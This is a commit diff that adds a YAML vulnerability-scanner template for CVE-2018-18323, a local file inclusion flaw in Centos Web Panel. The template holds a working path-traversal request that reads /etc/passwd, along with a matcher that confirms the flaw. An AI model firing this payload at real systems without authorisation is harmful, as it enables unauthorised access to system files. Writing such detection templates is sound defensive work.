Merge pull request #3232 from Akokonunes/patch-82

Create CVE-2018-18323.yaml
2021-12-01 19:16:06 +05:30 · 2021-12-01 19:16:06 +05:30 · ec4360339e
parent d3649d4f43 80df18b062
commit ec4360339e
1 changed files with 32 additions and 0 deletions
--- a/cves/2018/CVE-2018-18323.yaml
+++ b/cves/2018/CVE-2018-18323.yaml
@ -0,0 +1,32 @@
+id: CVE-2018-18323
+info:
+  name: Centos Web Panel 0.9.8.480 LFI
+  author: 0x_Akoko
+  severity: high
+  description: Centos Web Panel version 0.9.8.480 suffers from code execution, cross site scripting, and local file inclusion vulnerabilities.
+  reference:
+    - https://packetstormsecurity.com/files/149795/Centos-Web-Panel-0.9.8.480-XSS-LFI-Code-Execution.html
+    - http://centos-webpanel.com/
+    - https://www.cvedetails.com/cve/CVE-2018-18323
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2018-18323
+    cwe-id: CWE-22
+  tags: cve,cve2018,centos,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200